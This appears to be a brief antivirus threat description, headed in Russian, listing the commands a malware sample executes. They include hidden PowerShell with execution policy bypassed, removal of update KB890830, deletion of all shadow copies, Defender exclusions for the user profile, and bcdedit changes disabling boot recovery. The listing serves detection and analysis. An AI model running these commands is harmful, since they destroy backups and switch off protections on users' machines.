Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "wusa /uninstall /kb:890830 /quiet /norestart; vssadmin.exe delete shadows /all /quiet; Add-MpPreference -ExclusionPath @($env:UserProfile, ...
- '<SYSTEM32>\wusa.exe' /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\bcdedit.exe' /set -encodedCommand YwB1AHIAcgBlAG4AdAA= bootems off -inputFormat xml -outputFormat text
- '<SYSTEM32>\bcdedit.exe' /set -encodedCommand YwB1AHIAcgBlAG4AdAA= advancedoptions off -inputFormat xml -outputFormat text
- '<SYSTEM32>\bcdedit.exe' /set -encodedCommand YwB1AHIAcgBlAG4AdAA= optionsedit off -inputFormat xml -outputFormat text
- '<SYSTEM32>\bcdedit.exe' /set -encodedCommand YwB1AHIAcgBlAG4AdAA= bootstatuspolicy IgnoreAllFailures -inputFormat xml -outputFormat text
- '<SYSTEM32>\bcdedit.exe' /set -encodedCommand YwB1AHIAcgBlAG4AdAA= recoveryenabled off -inputFormat xml -outputFormat text